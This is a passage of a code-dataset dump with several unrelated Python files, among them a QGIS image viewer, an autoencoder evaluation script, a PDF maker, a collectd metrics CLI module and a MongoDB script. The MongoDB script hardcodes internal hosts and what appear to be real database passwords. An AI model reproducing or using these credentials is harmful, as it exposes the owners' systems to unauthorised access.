QgsMapCanvas)\n\nimport os.path\n\n\nclass MouseClick(QgsMapTool):\n afterLeftClick = pyqtSignal()\n afterRightClick = pyqtSignal()\n afterDoubleClick = pyqtSignal()\n\n def __init__(self, canvas, drawSelf):\n QgsMapTool.__init__(self, canvas)\n self.canvas = canvas\n self.drawSelf = drawSelf\n self.drawSelf.rb = None\n self.imageViewDLG = None\n\n def canvasPressEvent(self, event):\n if event.button() == 1:\n # sigeal : keep photo viewer on top of other windows\n if self.imageViewDLG != None :\n self.imageViewDLG.setWindowFlags(Qt.WindowStaysOnTopHint)\n self.drawSelf.refresh()\n\n # sigeal : display photo on click instead of double-click\n #def canvasDoubleClickEvent(self, event):\n def canvasReleaseEvent(self, event):\n layers = self.canvas.layers()\n p = self.toMapCoordinates(event.pos())\n w = self.canvas.mapUnitsPerPixel() * 10\n try:\n rect = QgsRectangle(p.x() - w, p.y() - w, p.x() + w, p.y() + w)\n except:\n return\n layersSelected = []\n for layer in layers:\n if layer.type():\n continue\n fields = [field.name().upper() for field in layer.fields()]\n if 'IMAGE' in fields:\n lRect = self.canvas.mapSettings().mapToLayerCoordinates(layer, rect)\n layer.selectByRect(lRect)\n selected_features = layer.selectedFeatures()\n if selected_features != []:\n layersSelected.append(layer)\n feature = selected_features[0]\n self.drawSelf.featureIndex = feature.id()\n activeLayerChanged = not hasattr(self.drawSelf, 'layerActive') or (self.drawSelf.layerActive != layer)\n self.drawSelf.layerActive = layer\n self.drawSelf.fields = fields\n self.drawSelf.maxlen = len(self.drawSelf.layerActive.name())\n self.drawSelf.layerActiveName = layer.name()\n self.drawSelf.iface.setActiveLayer(layer)\n imgPath = list(self.drawSelf.images.values())[self.drawSelf.featureIndex-1].source\n if imgPath:\n self.drawSelf.getImage = QImage(imgPath)\n if self.imageViewDLG is None or activeLayerChanged:\n self.imageViewDLG = QGraphicsView()\n self.showImage()\n else:\n self.iface.messageBar().pushCritical(\"Error\", \"No file path present\")\n \n # noinspection PyMethodMayBeStatic\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('Image', message)\n\n def showImage(self):\n scene = QGraphicsScene()\n self.imageViewDLG.setScene(scene)\n pixmap = QPixmap.fromImage(self.drawSelf.getImage)\n scene.addPixmap(pixmap)\n self.imageViewDLG.fitInView(scene.itemsBoundingRect(), Qt.KeepAspectRatio)\n self.imageViewDLG.show()\n\n # self.imageViewDLG.viewer.scene.addPixmap(pixmap)\n # self.imageViewDLG.viewer.setSceneRect(QRectF(pixmap.rect()))\n # self.imageViewDLG.viewer.resizeEvent([])\n # self.imageViewDLG.showNormal()","repo_name":"Serkhani/imageviewer","sub_path":"mouse_click.py","file_name":"mouse_click.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26482959213","text":"from __future__ import print_function\nfrom stylelens_object.objects import Objects\nfrom pprint import pprint\n# create an instance of the API class\napi_instance = Objects()\n\ntry:\n api_response = api_instance.get_objects(\"5a50d4ba4dfd7d90b8b9369a\",\n # is_indexed=True,\n sort_key='index',\n sort_order=1,\n is_main=True\n )\n pprint(api_response)\nexcept Exception as e:\n print(\"Exception when calling get_objects: %s\\n\" % e)\n","repo_name":"BlueLens/stylelens-object","sub_path":"sample/get_objects.py","file_name":"get_objects.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32301649879","text":"from autoencoder import Autoencoder\nfrom config import Config \nfrom data_source import Data_Source\nimport numpy as np \nimport tensorflow as tf \n\n\nconfig = Config()\nconfig.init()\nmodel = Autoencoder( config )\nif config.data_source == \"mnist\":\n\tfrom data_source import Data_Source\nelif config.data_source == \"ucf\":\n\tfrom data_source_ucf import Data_Source\nelif config.data_source == \"youtube\":\n\tfrom data_source_youtube import Data_Source\n\ndata_source = Data_Source( config )\nif config.train:\n model.train( data_source )\nelse:\n assert config.load_model != \"\"\n model.saver.restore( model.sess, config.load_model )\n\n sample, target = data_source.get_train_batch_ae()\n logit, decode = model.sess.run( [ model.logits, model.decode ], feed_dict = { model.sample_input: sample } )\n\n print( \"=== cross_entropy ===\" )\n\n ce = model.sess.run( tf.reduce_mean( tf.reduce_sum( tf.nn.sigmoid_cross_entropy_with_logits( logits = logit, labels = target ), axis = [2,3,4] ) ))\n print( ce )\n print()\n\n print( \"=== MSE ===\" )\n\n overall = np.mean( np.square( decode - target ) )\n print( \"Overall MSE: \", overall )\n print(\"\")\n\n recon = decode[ :, :config.ae_seq_l, :, :, : ]\n truth = sample[ :, :config.ae_seq_l, :, :, : ]\n recon_mse = np.mean( np.square( recon - truth ) )\n print( \"recon mse: \", recon_mse )\n print( \"\" )\n\n mse_list = []\n for i in range( config.ae_out_seq_l - config.ae_seq_l ):\n \tpred = decode[ :, i + config.ae_seq_l, :, :, : ]\n \ttruth = target[ :, i + config.ae_seq_l, :, :, : ]\n\n \tmse = np.mean( np.square( pred - truth ) )\n \tmse_list.append( mse )\n\n print( \"mse decay\", mse_list )\n print()\n\n print( \"=== SSIM ===\" )\n\n\n\n\n\n\n","repo_name":"YingjingLu/seq2seq-motion","sub_path":"calc_res.py","file_name":"calc_res.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22559212315","text":"from spacy import explain\nfrom fpdf import FPDF\n\n\nclass PDFMaker:\n def __init__(self, ID, font=\"helvetica\", font_size=16):\n self.font = font\n self.fontSize = font_size\n self.ID = ID\n\n def createMeetingNotes(self, paragraphs, entity_dict):\n pdf = FPDF()\n pdf.set_font(self.font, size=self.fontSize)\n\n pdf.add_page()\n pdf.cell(0, 10, txt=\"Meeting Notes\", ln=2, align=\"C\")\n\n for para in paragraphs:\n pdf.multi_cell(0, 10, txt=para, align=\"J\", ln=1)\n\n pdf.add_page()\n pdf.cell(0, 10, txt=\"Entities Found\", ln=2, align=\"C\")\n\n for (entityType, instance) in entity_dict.items():\n pdf.cell(0, 10, txt=explain(entityType), ln=1)\n\n for i in instance:\n pdf.cell(0, 10, txt=i, ln=1)\n\n pdf.output(f\"{self.ID}_MeetingNotes.pdf\")\n\n def createSummary(self, summaries, properNouns, links, n_summary):\n pdf = FPDF()\n pdf.set_font(self.font, size=self.fontSize)\n\n pdf.add_page()\n pdf.cell(0, 10, txt=\"Summary\", ln=2, align=\"C\")\n\n for para in summaries:\n pdf.multi_cell(0, 10, txt=para, align=\"J\", ln=1)\n\n pdf.add_page()\n pdf.cell(0, 10, txt=\"Important Keywords\", ln=2, align=\"C\")\n\n for i in range(len(properNouns)):\n pdf.cell(0, 10, txt=properNouns[i], ln=1, link=links[i])\n pdf.multi_cell(0, 10, txt=n_summary[i], ln=2)\n\n pdf.output(f\"{self.ID}_Summary.pdf\")\n\n\nif __name__ == \"__main__\":\n paragraphs = [\"para1\", \"para2\", \"para3\", \"para4\"]\n\n ed = {\"ORG\": [\"Apple\", \"Google\"], \"GPE\": [\"U.K.\"], \"MONEY\": [\"$1 billion\"]}\n\n summaries = [\"summary1\", \"summary2\"]\n\n properNouns = [\"Google\", \"U.K.\"]\n\n links = [\n \"https://en.wikipedia.org/wiki/Google\",\n \"https://en.wikipedia.org/wiki/United_Kingdom\",\n ]\n\n n_summaries = [\n \"Google LLC is an American multinational technology company that specializes in Internet-related services and products, which include online advertising technologies, a search engine, cloud computing, software, and hardware. It is considered one of the Big Five technology companies in the U.S. information technology industry, alongside Amazon, Facebook, Apple, and Microsoft. Google was founded in September 1998 by Larry Page and Sergey Brin while they were Ph.D. students at Stanford University in California.\",\n \"The United Kingdom of Great Britain and Northern Ireland, commonly known as the United Kingdom (UK) or Britain, is a sovereign country in north-western Europe, off the north-­western coast of the European mainland. The United Kingdom includes the island of Great Britain, the north-­eastern part of the island of Ireland, and many smaller islands within the British Isles. Northern Ireland shares a land border with the Republic of Ireland.\",\n ]\n\n pdf = PDFMaker(12)\n pdf.createMeetingNotes(paragraphs, ed)\n pdf.createSummary(summaries, properNouns, links, n_summaries)\n","repo_name":"KushGrandhi/Polaroid","sub_path":"ML/PDFMaker.py","file_name":"PDFMaker.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"28863278428","text":"from .module import Module\n\n\nclass Metrics(Module):\n dependencies = ['service']\n metric_choices = [\n 'memory',\n 'cpu'\n ]\n\n def __init__(self, **kwargs):\n super().__init__('metrics', **kwargs)\n\n def add_arguments(self, parser):\n subp = parser.add_subparsers(help='metrics help')\n\n p = subp.add_parser('ls', help='list metrics')\n p.add_argument('--all', '-a', action='store_true', help='include inactive metrics')\n p.set_defaults(metrics_handler=self.handle_list)\n\n p = subp.add_parser('mk', help='add metrics')\n p.add_argument('task', metavar='TASK', help='task name')\n p.add_argument('metric', metavar='METRIC', choices=self.metric_choices, help='metric')\n p.set_defaults(metrics_handler=self.handle_make)\n\n p = subp.add_parser('rm')\n p.add_argument('name', metavar='NAME', help='metric to remove')\n p.set_defaults(metrics_handler=self.handle_remove)\n\n p = subp.add_parser('clear')\n p.set_defaults(metrics_handler=self.handle_clear)\n\n def handle_list(self, args):\n self.list(args.all)\n\n def list(self, all):\n ctx = self.get_context()\n metrics = self.gets3(f'{ctx[\"cluster\"]}/metrics.json') or {}\n for task, mets in metrics.items():\n print(f'{task} ({\",\".join( sorted( mets ) )})')\n\n def handle_make(self, args):\n self.make(args.task, args.metric)\n\n def make(self, task_name, met_name):\n ctx = self.get_context()\n metrics = self.gets3(f'{ctx[\"cluster\"]}/metrics.json') or {}\n met_list = metrics.setdefault(task_name, [])\n if met_name in met_list:\n return\n met_list.append(met_name)\n self.puts3(f'{ctx[\"cluster\"]}/metrics.json', metrics)\n met = f'docker-{ctx[\"app\"]}-{task_name}.*-{met_name}.percent-'\n node_mod = self.client.get_module('node')\n cmd = f'echo {met} >> /usr/share/collectd/collectd-cloudwatch/src/cloudwatch/config/whitelist.conf'\n cmd += '; systemctl restart collectd'\n cmd = '\\'' + cmd + '\\''\n node_mod.all_run(cmd)\n\n def handle_remove(self, args):\n mach_mod = self.client.get_module('machine')\n cmd = 'echo args.name >> /usr/share/collectd/collectd-cloudwatch/src/cloudwatch/config/whitelist.conf'\n mach_mod.ssh_run(cmd, discard=False)\n\n def handle_clear(self, args):\n self.clear()\n\n def clear(self):\n ctx = self.get_context()\n self.puts3(f'{ctx[\"cluster\"]}/metrics.json', {})\n cmd = f'truncate -s 0 /usr/share/collectd/collectd-cloudwatch/src/cloudwatch/config/whitelist.conf'\n cmd += '; systemctl restart collectd'\n cmd = '\\'' + cmd + '\\''\n node_mod = self.client.get_module('node')\n node_mod.all_run(cmd)\n","repo_name":"uptick/python-fuku","sub_path":"fuku/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"27402863978","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/26 上午10:14\n# @Author : Sulong\n# @File : content_targeting.py\n# @Software: PyCharm\n\n'''\n朱丽叶健康:\n 内容定向表 对cms文章(物理删除) 做比对 检索已删除文章 删 除 更改 contentTargeting表中 articleExist 为 false\n \t\t\t\t\t\t\t\t\t\t\t\t未删除则不做任何操作\n'''\n# from pymongo import MongoClient\nfrom pymongo import MongoClient\nimport requests\nimport socket\n\ndef link_mongo(name):\n\tif name == 'test':\n\t\tclient = MongoClient('10.162.201.58', 3717)\n\t\tdb = client.zlydata # client['zlydata']\n\t\tdb.authenticate(\"opadmin\", \"opadmin_2016\")\n\t\tcollection = db.contentTargeting\n\t\treturn collection\n\tif name == 'official':\n\t\tclient = MongoClient('10.162.201.58', 3728)\n\t\tdb = client.zlydata # client['zlydata']\n\t\tdb.authenticate(\"opadmin\", \"MLN8v22BXG9YOCq7\")\n\t\tcollection = db.contentTargeting\n\t\treturn collection\n\n# 获取contentTargeting list\ndef get_content_list():\n\tcontentTargeting = []\n\tdb = link_mongo('test')\n\tfor i in db.find({'isDeleted': False, 'articleExist': True}):\n\t\t# print(i['_id'])\n\t\tcontentTargeting.append(i['articleId'])\n\treturn contentTargeting\n\n# 根据获取contentTargetinglist 获取 cms list\ndef get_cms_list(list,name):\n\tcms_list=[]\n\tif name =='test':\n\t\tcms_list = requests.get(url='http://articles_exists()', params={list}) # 带参数的GET请求\n\t\treturn cms_list\n\tif name =='official':\n\t\tcms_list = requests.get(url='http://articles_exists()', params={list}) # 带参数的GET请求\n\t\treturn cms_list\n\nif __name__ == '__main__':\n\tlink_mongo('test')\n\t# print(l)\n\t# s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\t# host = '10.174.89.71'\n\t# port = 8181\n\t# conn = s.connect((host,port))\n\t# print('connected to server %s' % host)\n\t# # msg = s.recv(1024)\n\t# conn.use_service(['add'])\n\t# err, res = conn.add(1, 2)\n\t# print('result: %s' % str(res))\n\t# conn.disconnect()\n\t# print('disconnected from server %s' % host)\n\t# s.close()","repo_name":"Sulongsl/python","sub_path":"script/content_targeting.py","file_name":"content_targeting.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18271156","text":"import socket\nimport threading\nfrom enum import Enum\n\nfrom libx import user1 as bob\nfrom user_functions import *\n\n\n# bob.InitOT(1) # for client\n\nclass ApplicationType(Enum):\n SERVER = 0\n CLIENT = 1\n\n\ndef send_x(connection):\n while True:\n x = input(\"x: \")\n y = input(\"y: \")\n xy = x + '$' + y\n print(xy)\n connection.send(bytes(xy, 'utf-8'))\n\n\napplicationType = ApplicationType.CLIENT\n\npeer = '127.0.0.1'\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n# Try to start as a client. If failed, then start as a server and wait a client\ntry:\n sock.connect((peer, 10000))\nexcept ConnectionRefusedError:\n sock.bind(('0.0.0.0', 10000)) # binding to local network card, port 10000\n sock.listen(1)\n applicationType = ApplicationType.SERVER\n\n# Set up user\nbob.InitOT(applicationType.value)\n\n# Different implementations for Client and Server\nif applicationType == ApplicationType.SERVER:\n securityParam = generate_security_params(bob)\n conn, addr = sock.accept()\n sock = conn\n pass\nelse:\n pass\n\nvaluesReceived = {'blindedK': False, 'otherP': False, 'otherQ': False, 'blindedR': False, 'otherA': False,\n 'otherE': False}\n\n# Generate Blinded Key\nbobBKey = bob.GetBlinedKey()\n\n# pass -> to Alice and get from alice\n\n# get salary\nbobSalary = 503554646651\nbob.SetCompareValue(bobSalary)\n\nprint(\"Bob: Connected to Alice\")\n\npayload = \"first payload\"\n\n# Protocol\nwith sock:\n iThread = threading.Thread(target=send_x, args=(sock,))\n iThread.daemon = True\n iThread.start()\n\n while True:\n if payload != 0:\n data = sock.recv(1024)\n payload = extractData(str(data, 'utf-8'))\n print(payload)\n else:\n print(\"NOT WORKING\")\n","repo_name":"dulajdilshan/salary_check","sub_path":"chckpnt_client1_app.py","file_name":"chckpnt_client1_app.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8417462682","text":"\"\"\"\nДан список, содержащий положительные и отрицательные\nчисла. Заменить все элементы списка на противоположные по\nзнаку. Например, задан список [1, -5, 0, 3, -4]. После\nпреобразования должно получиться [-1, 5, 0, -3, 4].\n\"\"\"\nimport random\nLIST_SIZE = 5\n\n\ndef list_generator(list_dimension):\n my_list = []\n for i in range(list_dimension):\n my_list.append(random.randint(-9, 9))\n return my_list\n\n\ndef list_converter(some_list):\n for i in range(len(some_list)):\n some_list[i] = -some_list[i]\n return some_list\n\n\nif __name__ == '__main__':\n def_list = list_generator(LIST_SIZE)\n print('Для случайного списка:', def_list)\n print('Наше преобразование выглядит следующим образом:', list_converter(def_list))\n\n","repo_name":"litvinovserge/WebAcademy","sub_path":"HomeWork_06/Task_03.py","file_name":"Task_03.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30858682651","text":"\r\nfrom AL_wlib import *\r\nimport pandas as pd\r\nimport numpy as np\r\nplt_show = False\r\n\r\ndef setup(s=1.0, nrows=1, ncols=1):\r\n import matplotlib\r\n matplotlib.rcParams.update({'figure.dpi': 1080})\r\n matplotlib.rcParams.update({'font.size': 15})\r\n\r\n matplotlib.rcParams.update({'legend.fontsize': 13})\r\n import __main__ as pc\r\n pc.default_figsize=(20, 10)\r\n pc.default_figsize = (pc.default_figsize[0]*s, pc.default_figsize[1]*s)\r\n import matplotlib.pyplot as plt\r\n plt.close()\r\n return plt.subplots(nrows, ncols, figsize=pc.default_figsize)\r\nclass PlotStyles:\r\n def __init__(self):\r\n self.markers = []\r\n self.markers += ['.']\r\n self.markers += ['1', '2', '3', '4', '+', 'x']\r\n self.markers += [4, 5, 6, 7, 8, 9, 10, 11]\r\n self.linestyles = [\r\n (0, (1, 1)),\r\n (0, (5, 10)),\r\n (0, (5, 5)),\r\n (0, (5, 1)),\r\n (0, (3, 10, 1, 10)),\r\n (0, (3, 5, 1, 5)),\r\n (0, (3, 1, 1, 1)),\r\n (0, (3, 5, 1, 5, 1, 5)),\r\n (0, (3, 10, 1, 10, 1, 10)),\r\n (0, (3, 1, 1, 1, 1, 1))\r\n ]\r\n self.colors = ['tab:blue', 'tab:orange', 'tab:green', 'tab:red', 'tab:purple', 'tab:brown', 'tab:pink', 'tab:gray', 'tab:olive', 'tab:cyan','tab:black']\r\n self.reset()\r\n def reset(self):\r\n self.c_colors = 0\r\n self.c_markers = 0\r\n self.c_linestyles = 0\r\n def set_color_counter(self, c):\r\n self.c_colors = c\r\n def set_marker_counter(self, c):\r\n self.c_markers = c\r\n def set_linestyle_counter(self, c):\r\n self.c_linestyles = c\r\n def getNextStyle(self):\r\n retval = {}\r\n retval['color'] = self.colors[self.c_colors % len(self.colors)]\r\n retval['marker'] = self.markers[self.c_markers % len(self.markers)]\r\n retval['linestyle'] = self.linestyles[self.c_linestyles % len(self.linestyles)]\r\n self.c_colors += 1\r\n self.c_markers += 1\r\n self.c_linestyles += 1\r\n return retval\r\n\r\n\r\nfrom warnings import filterwarnings\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\nphy_data = pd.read_pickle(\"./phy_2go.pkl\")\r\nclasses = np.load(\"./phy_2go_class.npy\")\r\n\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(phy_data['Body'], classes,test_size =0.1, random_state=0)\r\n\r\nX_train=X_train.to_numpy()\r\nX_test=X_test.to_numpy()\r\n\r\n\r\nquery_size=25\r\ninitdata=10\r\n\r\n\r\nselection=np.random.choice(X_train.shape[0], initdata, replace=False)\r\n\r\n\r\n\r\n\r\n\r\n\r\nconfiguration5=config(query_size, OneVsRestClassifier_Ada, qbc, TfidfVectorizer,401, [], [5,(1,1)] )\r\nmodel5=ALmodel(configuration5,X_train,y_train,X_test,y_test,selection)\r\n\r\nmodel5.run()\r\nprint(\"Hey\")\r\n\r\nconfiguration=config(query_size, OneVsRestClassifier_Ada, infodensity, TfidfVectorizer,401, [], [5,(1,1)])\r\nmodel=ALmodel(configuration,X_train,y_train,X_test,y_test,selection)\r\n\r\nmodel.run()\r\n\r\n\r\nconfiguration_r=config(query_size, OneVsRestClassifier_Ada, RandomSelection, TfidfVectorizer,401, [], [5,(1,1)] )\r\nmodel_r=ALmodel(configuration_r,X_train,y_train,X_test,y_test,selection)\r\n\r\nmodel_r.run()\r\n\r\nconfiguration2=config(query_size, OneVsRestClassifier_Ada,MarginSelection, TfidfVectorizer,401, [], [5,(1,1)] )\r\nmodel2=ALmodel(configuration2,X_train,y_train,X_test,y_test,selection)\r\n\r\nmodel2.run()\r\n\r\n#configuration3=config(query_size, RandomForest, graph, TfidfVectorizer,50, [], [5,(1,1)] )\r\n#model3=ALmodel(configuration3,X_train,y_train,X_test,y_test,selection)\r\n\r\n#model3.run()\r\nprint(\"Hey\")\r\n\r\n\r\n#configuration4=config(query_size, RandomForest, quire, TfidfVectorizer,50, [], [5,(1,1)] )\r\n#model4=ALmodel(configuration4,X_train,y_train,X_test,y_test,selection)\r\n#model4.run()\r\n\r\nps = PlotStyles()\r\nvectorizer=tfidfvec(max_features=5000,min_df=5,ngram_range=(1, 1))\r\nvectorizer.fit(X_train)\r\nX_full_Vect = vectorizer.transform(X_train)\r\nfrom sklearn.multiclass import OneVsRestClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier as randoforest\r\nfrom sklearn.ensemble import AdaBoostClassifier as adaboost\r\nfrom sklearn.svm import LinearSVC\r\nmodel_full=OneVsRestClassifier(adaboost())\r\nmodel_full.fit(X_full_Vect, y_train)\r\nprediction = model_full.predict(vectorizer.transform(X_test))\r\naccuracy_whole=accuracy_score(y_test, prediction)\r\n\r\n\r\nfig, ax = setup()\r\n\r\n\r\ntraining_size=[m*query_size for m in range (len(model.accuracy_test))]\r\naccuracy_whole = [accuracy_whole for m in range (len(model.accuracy_test))]\r\n\r\nprint( model.accuracy_test)\r\nprint( model_r.accuracy_test)\r\nprint( model2.accuracy_test)\r\nprint( model5.accuracy_test)\r\nprint (accuracy_whole)\r\nax.plot(training_size, model_r.accuracy_test,**ps.getNextStyle(), label='random selection batch=25')\r\nax.plot(training_size, model.accuracy_test,**ps.getNextStyle(), label='infodensity selection batch=25')\r\nax.plot(training_size, model2.accuracy_test,**ps.getNextStyle(), label='margin selection batch=25')\r\nax.plot(training_size, model5.accuracy_test,**ps.getNextStyle(), label='qbc selection batch=25')\r\nax.plot(training_size, accuracy_whole,**ps.getNextStyle(), label='training with whole data')\r\n\r\n\r\n\r\n\r\nprint(\" (((0) \")\r\n\r\n\r\ntit='OneVsRestClassifier_Ada, 25 class physics data, batch size=10, queried limit =400'\r\nax.set(xlabel='labeled data size', ylabel='accuracy with test data',title=tit)\r\nax.grid(which='minor', alpha=0.2)\r\nax.grid(which='major', alpha=0.5)\r\nax.legend()\r\nfig.savefig('OneVsRestClassifier_Ada _batch25_lim400.svg', format='svg', dpi=1080)\r\n","repo_name":"yusaemek/NLP-with-Active-Learning","sub_path":"active_NLP/phys_exchange/act_learn_wplot.py","file_name":"act_learn_wplot.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35444842061","text":"\"\"\"Roman numerals are represented by seven different symbols: I, V, X, L, C, D\nand M.\n\nSymbol Value\nI 1\nV 5\nX 10\nL 50\nC 100\nD 500\nM 1000\n\nGiven a roman numeral, convert it to an integer.\nInput: s = \"III\"\nOutput: 3\nExplanation: III = 3.\n\nInput: s = \"LVIII\"\nOutput: 58\nExplanation: L = 50, V= 5, III = 3.\n\nInput: s = \"MCMXCIV\"\nOutput: 1994\nExplanation: M = 1000, CM = 900, XC = 90 and IV = 4.\n\n1 <= s.length <= 15\ns contains only the characters ('I', 'V', 'X', 'L', 'C', 'D', 'M').\nIt is guaranteed that s is a valid roman numeral in the range [1, 3999].\"\"\"\n\n\nIV = 4\nIX = 9\nXL = 40\nXC = 90\nCD = 400\nCM = 900\n\n\nclass ArabianRomanConvertor:\n __roman_arabian = {\n 'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000,\n 'IV': 4, 'IX': 9, 'XL': 40, 'XC': 90, 'CD': 400, 'CM': 900\n }\n\n @staticmethod\n def roman_to_arabian(x):\n value = 0\n i = 0\n while i < len(x):\n if i < len(x) - 1:\n try:\n value_complex_key = (\n ArabianRomanConvertor.__get_arabian_by_char(\n x[i] + x[i + 1])\n )\n value += value_complex_key\n i += 2\n except ValueError:\n value += ArabianRomanConvertor.__get_arabian_by_char(x[i])\n i += 1\n else:\n value += ArabianRomanConvertor.__get_arabian_by_char(x[i])\n i += 1\n return value\n\n @staticmethod\n def __get_arabian_by_char(char):\n if ArabianRomanConvertor.__roman_arabian.get(char) is None:\n raise ValueError(\"x is not Roman\")\n else:\n return ArabianRomanConvertor.__roman_arabian.get(char)\n\n\nassert ArabianRomanConvertor.roman_to_arabian(\"III\") == 3\nassert ArabianRomanConvertor.roman_to_arabian(\"LVIII\") == 58\nassert ArabianRomanConvertor.roman_to_arabian(\"MCMXCIV\") == 1994\n","repo_name":"konmin123/Leetcode_","sub_path":"13. Roman to Integer.py","file_name":"13. Roman to Integer.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"4343422595","text":"import sys\r\nfrom collections import deque\r\n\r\nn, m = map(int, sys.stdin.readline().split())\r\narray = list()\r\n\r\nfor _ in range(m):\r\n array.append(list(map(int, sys.stdin.readline().split())))\r\n\r\ndirec = [[-1]*n for _ in range(m)]\r\n\r\nstora = deque()\r\n\r\nfor i in range(m):\r\n for j in range(n):\r\n if array[i][j] == 1:\r\n direc[i][j] = 0\r\n stora.append((i,j))\r\n\r\nwhile stora:\r\n y, x = stora.popleft()\r\n\r\n for y1, x1 in ([y-1, x], [y+1, x], [y, x+1], [y, x-1]):\r\n if 0 <= y1 < m and 0 <= x1 < n:\r\n if array[y1][x1] == 0 and direc[y1][x1] == -1:\r\n stora.append((y1,x1))\r\n direc[y1][x1] = direc[y][x] + 1\r\n\r\n\r\nans = max([max(row) for row in direc])\r\nfor i in range(m):\r\n for j in range(n):\r\n if array[i][j] == 0 and direc[i][j] == -1:\r\n ans = -1\r\n\r\nprint(ans)","repo_name":"kalelpark/Baekjoon-Programmers","sub_path":"DFS&BFS/BOJ2667.py","file_name":"BOJ2667.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39639767943","text":"import pygame as pg\n\n\ndef t1():\n pg.init()\n\n screen = pg.display.set_mode((640, 480))\n clock = pg.time.Clock()\n BG_COLOR = pg.Color('gray12')\n SIENNA = pg.Color('sienna1')\n radius = 20\n # This rect serves as the position of the circle and\n # can be used for collision detection.\n rect = pg.Rect(50, 200, radius, radius)\n\n done = False\n while not done:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n done = True\n\n rect.x += 1 # Update the position of the rect.\n\n screen.fill(BG_COLOR)\n # Now draw the circle at the center of the rect.\n pg.draw.circle(screen, SIENNA, rect.center, radius)\n pg.display.flip()\n clock.tick(30)\n\n pg.quit()\n\n\nif __name__ == '__main__':\n t1()\n","repo_name":"lukwil/Mobile-Robots","sub_path":"t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29940365164","text":"# -*- coding: utf-8 -*-\n\"\"\"\nImports data from a CSV into a pandas dataframe\n@author: Marvin\n\"\"\"\nimport pandas as pd\n#Actually imports the data from a CSV while specifying the header names, \n#the separator, how many rows to skip, and the NA values.\n#skiprows skips the header row\n\ncity_file = 'D:\\\\Users\\\\Marvin\\\\Google Drive\\\\CSC\\\\CSC495\\\\Amazon Problem\\\\city_list.csv'\ncity_list = pd.read_csv(city_file, names=['state', 'city', 'MSA', 'is_top_twenty'],\n sep='|', skiprows=1, na_values=[0])\n\ncommute_times_df = city_list\ncommute_times_df['Average Commute Time'] = 0\n\ncity_commute_file = 'D:\\\\Users\\\\Marvin\\\\Google Drive\\\\CSC\\\\CSC495\\\\Amazon Problem\\\\commute_times_city.csv'\ncity_commute_df = pd.read_csv(city_commute_file, names=['index','City','Avg Commute Time'], \n sep='|', skiprows=1, na_values=['?'], encoding='latin-1')\n#city_commute_df = city_commute_df.drop(['index'], axis=1)\n\ncity = []\nstate = []\n\nus_state_abbrev = {\n 'Alabama': 'AL',\n 'Alaska': 'AK',\n 'Arizona': 'AZ',\n 'Arkansas': 'AR',\n 'California': 'CA',\n 'Colorado': 'CO',\n 'Connecticut': 'CT',\n 'Delaware': 'DE',\n 'Florida': 'FL',\n 'Georgia': 'GA',\n 'Hawaii': 'HI',\n 'Idaho': 'ID',\n 'Illinois': 'IL',\n 'Indiana': 'IN',\n 'Iowa': 'IA',\n 'Kansas': 'KS',\n 'Kentucky': 'KY',\n 'Louisiana': 'LA',\n 'Maine': 'ME',\n 'Maryland': 'MD',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'Minnesota': 'MN',\n 'Mississippi': 'MS',\n 'Missouri': 'MO',\n 'Montana': 'MT',\n 'Nebraska': 'NE',\n 'Nevada': 'NV',\n 'New Hampshire': 'NH',\n 'New Jersey': 'NJ',\n 'New Mexico': 'NM',\n 'New York': 'NY',\n 'North Carolina': 'NC',\n 'North Dakota': 'ND',\n 'Ohio': 'OH',\n 'Oklahoma': 'OK',\n 'Oregon': 'OR',\n 'Pennsylvania': 'PA',\n 'Rhode Island': 'RI',\n 'South Carolina': 'SC',\n 'South Dakota': 'SD',\n 'Tennessee': 'TN',\n 'Texas': 'TX',\n 'Utah': 'UT',\n 'Vermont': 'VT',\n 'Virginia': 'VA',\n 'Washington': 'WA',\n 'Washington DC': 'DC',\n 'West Virginia': 'WV',\n 'Wisconsin': 'WI',\n 'Wyoming': 'WY',\n 'Puerto Rico': 'PR',\n}\n\nabbrev_to_state = 